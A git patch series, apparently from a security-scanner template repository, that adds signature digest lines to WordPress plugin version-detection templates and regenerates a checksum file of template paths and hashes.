'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a38fe02b7265c26c09d083403e553b939a8e12857204c36c7b89e7c7328e4ba0022100e9db293cf44de1a5c082216149e10a94c76af90532fbb0aab04c6e3970224474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..4314a4073b 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220490cbdf83a0c7138b5a22ac57849dc5bcc6a5a9f0d8768c8f26ccf9bd73b90d2022100ff5dee04a1d41a2abcb9d30ae0fd8d9ab214e6959050e8fc9703a22b9ccde6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..628dae26e6 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0460b28e72144a570127a8a152d0a1df737c4739caf5b363463da3ae50def010221009bbed5b55f4da0a4ca2d5399a40654a19c08c0a03808078a3f6ca3cb7ac6f52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..7e505846ff 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0bc1e6e42412e800058e3a38a3359014075f7ac76b91a4129e0d495770c7bc022100a1d4850a69daa1df5a4a6ddccb2d5d3e0166325199c21a79ba5a9e3d4c39def8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..fc5dee5b00 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201b48c84fc07db2502c03f777a2a67e414369635f96fa1368db46c4d1e1ff86c8022100c836f1fc9cf3962922c1c93f35a066ba78ad5866d3c31ed6c6fa99dea9a73481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..54f14ff439 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b6da2d686ac6a328e6e91ffa150a155418984677df6bdebb65967ab9e85d76802202faa25a0478e896185597b7b3cafab51d67b08f3b2eb16c84c6e4bfe94c86f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..51b323580a 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7217d896958cb05697bb3a37e8cf0a3dcdf43013986ebc289178643cd6b0960022054842db494950f0c1e2179b41c7ded3dad71eff105402496181ebae25c7901f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..e0e73ec015 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d349af52ec14d5a3159d65c082a65a987efc95ca24153d8780f3dd3a4238100a022100c6c95d51fc5f70ad3cbd948af45e7cbf471841672fd232fa0da0817214671b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..f16ad833e4 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f00ea28c2555739c2f201991b222d8726994383aba5e12ef181c730cdf6514ed02201983698d472efbf280b8e83143928eb2a82026b283a1eb8a990db9d6e018469a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..35804d6210 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030cd35a3a89bbc9792988aa02e4c66df96b19b332dc9e313363dc5201602001802205e82fb8496a6cd9056ac66599f3341d023d68524d097438727eab096feb73501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..adf53f064f 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205212c8b7e83bf81f59d32a4ce8101641b6d77e7bb070cd54da5c5c36ac211d170221008f4cb36e35eb3a4df0930fee33903405d4d69d01dd1518755b4989674d15afde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..70fd52525e 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c352046b38d5de9b968796c6a0ad507f44de816accb907376cd96f69bcc6d0022100cde26b7eda7a1e9ee7ab5a0cd8a347ec776eec6ce428ef848e9991cc35a35db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..cf22cab68e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c55434dd9d277759778ccc2e79706aa230036bf1a068552eab760e0e1d144f6b022012ea0155c4342079df63a9c5300c02f6ae3017450b9d6156646af41e74a55d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..d885ff3fae 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd48a444f2baf63545e75757601e66d9d20a290b13b51fc8dd64fdbfd929c35f022100abd7003d6c190eb5c4215ea5b1060258c4440d4fadcce4c4b0bd735c2f5dcb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..6f9da74cae 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d4b5a920160c8cd6b93b436ef63f1177b14a8af414b7fa18a1c3d4f5811709d02207e1a424affe390f466f6f69c1b2c4bbf9c9b462450559625a17cc2e87674d1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..dc84f1c6a4 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203aa723dd4aee2c9e596cfbd43b1d1b018b3210aa953a9aed070fe68536e31a1d022100e92ac3098771e4a2ab26c43e267d5ecf2993e3c770c3ee193913ec95e5067aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..29214c8940 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059721dd8b02050eeeef7211d6ddc8c6f5c327d8bcf9bac29cd1d264db14742330221008e65617e4e31fbed04b338e435c9b4dae3c57094c332d01f6c9a969316dab4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..9977df376f 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd6e114fd42a31c3e0024f68927972b9b67535592094cdc1e322047afe917efc02207af3b38a929f8ebe39b4904baef73a3104b1c7b5e9e19d1d93f29bfbfe93e914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..78a69d103e 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e8e67df2e82cebd4ef73b5fc34caca32343da02ac08327167b257aca2696b4fb02210094b71c31669b3a9a84887054bcdfd88de08783c30f6ae542d42c93aa779c76fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..b1726192cd 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a13deec49f9210240a8bea9315ec997f64157909437278302166238cf5626b30022047c30dcc5043a96f954af02341c3f4337d22ac4cbdb67b2f51cef5ba8e673507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..0679a001f3 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5ab2b278c189539908d5eb36294ffc0342917bd26b7208d91d570f93fd4d35e022100dddc49e08813e1fc47b2483923352ce00e311c047576c6c26a0033998b71db8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..79a4a0ea2c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b688a4888b077484fe596645fc8ac3f488e39e8439c21dfcbf9727a568d8eea022100b2dd0b7680ff49c9209522a2434f59e96a67b264d18ea18091237d6e9de2d550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..47d6d3fc03 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054893c90d92a403505a413ae3d9ecc986fd27d89b3820c8b8da9c42c81ca4f5b022059f923045b7a8e9bfa6efabef8f37af25dfc56aaae8e0335f47725587439d1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..be61093ee3 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220399e770a7d511e3c609d2f16df9b710e2a1ccb6e95a9662431c3b8e2d01954c002203839aee43d2f0ee06a605f4363cae3ed8275f86076d9b8ca0eb04dd6d3825746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..51c453e66e 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202fa51b7060e4bb18976a21519067c54c0dbc8e91fbe50821b5e1cd0e8f9b1fb3022100c4f09621951f5a234bb7b018e55f4e8e8b0a891d193bd2d237e621644b23047b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..8f429f3135 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad5f880a2e3f6a3e85d73566b1e09682714e63a58cc7b31905b157a39844d42602204adb0be0dbcfb0bbf46ebaf828b44418a45d20d8dc47d3b14a9c9505db4eb0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..df24e4294a 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028b65b533a28836a9e78665f1b68f20824f05271589f6a791660e5c45243b0bd0220120ba40d5a24cd3640bf081f67bf37251e4c4e1cc0c63a4542aca9912917e3a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index 025d5a3294..deb394d9ab 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b327ea17f154456b706a540e72c9c79e4c901a70091e38648ed261ecd5b0094502202f0ae209b845dc30c6fb92d9f33617dbca5720568776d2b1e8df2c17cb36202d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9e6be0b5e89d25f7819aa19221456d7654e834c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:44:24 +0000 Subject: [PATCH 1205/1841] Auto Generated Templates Checksum [Sun Jul 14 08:44:24 UTC 2024] :robot: --- templates-checksum.txt | 408 ++++++++++++++++++++--------------------- 1 file changed, 204 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d90b366a0e..20bd3ba60f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -240,7 +240,7 @@ dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 -dast/vulnerabilities/redirect/open-redirect.yaml:68ac64ef8cf7ae88c1484f5c178057ebdcd8023b +dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 @@ -5823,7 +5823,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:488f8534a4929b8deb745780feea319f8d9decbd +http/misconfiguration/mixed-active-content.yaml:ceb7f34460e65ee99552442d17590a164b60d28e http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb93 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -7279,228 +7279,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:2c03be2a489d02086e8813d7ad847c0ad3dd7aed +http/technologies/wordpress/plugins/add-to-any.yaml:3aa9016ef0d3ea59baa3fe10c9adf934be896387 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:894597d021248e51e6a89adc455688ef7478c067 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:99e512547b8ccd401a46cd9c39584fa5804eca70 +http/technologies/wordpress/plugins/akismet.yaml:a01aefeac3fcfeebfb1af663a2d78ed6898e7170 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:237029cee578746310d220dc0a9673052fa1f525 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:90b75d28fcb36d92c4edc2a2441c00edbfc45181 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:03eaa1bfc120647a3d2a5e9cc574ee6cd3705f5d +http/technologies/wordpress/plugins/amp.yaml:7e933d54de0c7c47f5610cfb4340f36150e753c5 +http/technologies/wordpress/plugins/antispam-bee.yaml:e5e3072d23794684cafa941394b46fd96a28adaa +http/technologies/wordpress/plugins/astra-sites.yaml:7bbc9d8214f5301a1ae996d1bff4277eb28bd904 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:bd4204a8d3304faf8f87a47f16fd7050ab837076 +http/technologies/wordpress/plugins/backwpup.yaml:5c96d6d1cc1e4c06630a430c38947c7a98954488 +http/technologies/wordpress/plugins/better-search-replace.yaml:a1a8ab4353c0dd975cc6922ca883f85b3babab8b +http/technologies/wordpress/plugins/better-wp-security.yaml:9238b4e15a9c87629b34b378bf6dd5bafbb9268a +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:da7756b499eb168d91279ffcb8300024170b8ed4 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1a97cb21f5bc2880fcb34e370f42edbf1b2cb25f +http/technologies/wordpress/plugins/breeze.yaml:de3c7485b46fe3723c378d33c66303ada6ab08c9 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0c5e75220423ab609c0cec2f9d8bba9da6a6a745 +http/technologies/wordpress/plugins/chaty.yaml:4b22e2f7d14295a1397a0501b749824b20e51562 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:448b32b3a09451524b4611bb574a0af514d3d112 +http/technologies/wordpress/plugins/classic-editor.yaml:f9de7282e8a4f3636f8289a74892ab1b133709e2 +http/technologies/wordpress/plugins/classic-widgets.yaml:0671a4fb0b3a51406a7cd855b58aabea7fd4fdbc +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:8cb9275d92436c072ba9e5fe7673fa4df48bc3a9 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:262d760e3cabbf08044b70eaa37648444a513e10 +http/technologies/wordpress/plugins/coblocks.yaml:74c1b3d0a30c62f647866d328875034cf03e767d +http/technologies/wordpress/plugins/code-snippets.yaml:a415bf81573b7cd6e21cf80c977d15217b66733c +http/technologies/wordpress/plugins/coming-soon.yaml:56ff6cd44ed553dab7557381f6826bc22be6d0d6 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:45ab5ff533729da12df15efdc2af5d6076dd63dd +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:25f25560c6191b9b13dcdd39f20657817f8dd712 +http/technologies/wordpress/plugins/contact-form-7.yaml:9b18111c1d3ef8aa0a9a14e3c3d1dee75519e022 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dc6f12cabb4452f9b7db40f2d0f4cf6014dc5e9f +http/technologies/wordpress/plugins/cookie-law-info.yaml:501cfd5ed8d2a41ccc66e8ec96ff4e46ccc4b04f +http/technologies/wordpress/plugins/cookie-notice.yaml:0ea921a09cf09548d3abe14ccaeb61c1d4dfd3f0 